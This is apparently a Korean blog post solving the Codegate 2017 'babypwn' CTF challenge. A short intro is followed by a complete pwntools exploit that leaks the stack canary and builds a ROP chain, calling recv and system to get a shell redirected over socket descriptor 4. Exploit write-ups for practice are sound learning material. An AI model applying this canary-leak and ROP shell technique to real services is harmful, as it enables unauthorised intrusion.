codegate 2017 - babypwn

Codegate 2017 - babypwn 문제입니다.

카나리 익스 연습하려고 추천해주셔서 풀어봤습니다.

원격으로 서버열어서 쉘따는 부분이 0>&4 1>&4 입출력 다 원격으로 바꾸는게 신기했습니다. 물론 저부분은 도움없었으면 못풀었을거에요 ㅠ

from pwn import *
 
r = remote('127.0.0.1',6666)
e = ELF('./babypwn')
 
 
bss = 0x0804b1b8+0x32
binsh = "/bin/sh 0>&4 1>&4"
system_plt = e.plt['system']
recv_plt = e.plt['recv']
ppppr = 0x08048eec
 
 
pay = ""
pay += "A" * 40
 
print(r.recvuntil("> "))
r.sendline(str(1))
print(r.recvuntil(": "))
r.sendline(pay)
print(r.recvuntil("A"*40))
canary = u32(r.recv(4)) - 0x0a
print hex(canary)
 
sleep(0.3)
print r.recvuntil("> ")
r.sendline("1")
print r.recvuntil(": ")
 
pay += p32(canary)
pay += "A"*12
 
pay += p32(recv_plt)
pay += p32(ppppr)
 
pay += p32(0x04)
pay += p32(bss)
pay += p32(len(binsh))
pay += p32(0x00)
 
pay += p32(system_plt)
pay += "A"*4
pay += p32(bss)
 
r.sendline(pay)
sleep(0.3)
print r.recvuntil("> ")
r.sendline("3")
r.send(binsh)
r.interactive()\